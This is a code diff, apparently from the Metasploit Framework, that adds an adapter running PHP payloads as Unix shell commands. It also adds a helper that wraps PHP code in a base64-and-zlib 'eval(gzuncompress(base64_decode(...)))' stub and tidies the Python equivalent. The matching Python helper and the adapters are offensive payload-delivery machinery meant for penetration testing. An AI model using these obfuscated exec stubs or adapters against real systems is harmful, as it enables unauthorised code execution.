Add an ARCH_PHP -> ARCH_CMD adapter

Author: zeroSteiner

lib/msf/core/payload/php.rb

@@ -136,9 +136,18 @@ def php_system_block(options = {})
 
     exec_methods = [passthru, shell_exec, system, exec, proc_open, popen]
     exec_methods = exec_methods.shuffle
-    buf = setup + exec_methods.join("") + fail_block
+    setup + exec_methods.join("") + fail_block
+  end
 
-    return buf
+  def self.create_exec_stub(php_code, wrap_in_tags: true)
+    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code))
+    b64_stub = "eval(gzuncompress(base64_decode('#{payload}')));"
+    b64_stub = "<?php #{b64_stub} ?>" if wrap_in_tags
+    b64_stub
+  end
 
+  def php_create_exec_stub(php_code)
+    Msf::Payload::PHP.create_exec_stub(php_code)
   end
+
 end

lib/msf/core/payload/php/send_uuid.rb

@@ -17,7 +17,7 @@ def php_send_uuid(opts={})
     sock_var = opts[:sock_var] || '$s'
     sock_type = opts[:sock_type] || '$s_type'
 
-    uuid = opts[:uuid] || generate_payload_uuid
+    uuid = opts[:uuid] || generate_payload_uuid(arch: ARCH_PHP, platform: 'php')
     uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
 
     php = %Q^$u="#{uuid_raw}";

lib/msf/core/payload/python.rb

@@ -8,18 +8,18 @@ module Msf::Payload::Python
   # one line and compatible with all Python versions supported by the Python
   # Meterpreter stage.
   #
-  # @param cmd [String] The python code to execute.
+  # @param python_code [String] The python code to execute.
   # @return [String] Full python stub to execute the command.
   #
-  def self.create_exec_stub(cmd)
+  def self.create_exec_stub(python_code)
     # Encoding is required in order to handle Python's formatting
-    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(cmd))
+    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(python_code))
     b64_stub = "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{payload}')[0])))"
     b64_stub
   end
 
-  def py_create_exec_stub(cmd)
-    Msf::Payload::Python.create_exec_stub(cmd)
+  def py_create_exec_stub(python_code)
+    Msf::Payload::Python.create_exec_stub(python_code)
   end
 
 end

modules/payloads/adapters/cmd/unix/php.rb

@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PHP Exec',
+        'Description' => 'Execute a PHP payload as an OS command from a Posix-compatible shell',
+        'Author' => 'Spencer McIntyre',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_PHP,
+        'AdaptedPlatform' => 'php'
+      )
+    )
+  end
+
+  def compatible?(mod)
+    if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
+      return false
+    end
+
+    super
+  end
+
+  def include_send_uuid
+    true
+  end
+
+  def generate(_opts = {})
+    payload = super
+
+    escaped_exec_stub = Shellwords.escape(Msf::Payload::Php.create_exec_stub(payload))
+
+    if payload.include?("\n")
+      escaped_payload = escaped_exec_stub
+    else
+      # pick the shorter one
+      escaped_payload = [Shellwords.escape(payload), escaped_exec_stub].min_by(&:length)
+    end
+
+    "echo #{escaped_payload}|exec php"
+  end
+end

modules/payloads/adapters/cmd/unix/python.rb

@@ -11,7 +11,7 @@ def initialize(info = {})
       update_info(
         info,
         'Name' => 'Python Exec',
-        'Description' => 'Execute a Python payload from a command',
+        'Description' => 'Execute a Python payload as an OS command from a Posix-compatible shell',
         'Author' => 'Spencer McIntyre',
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,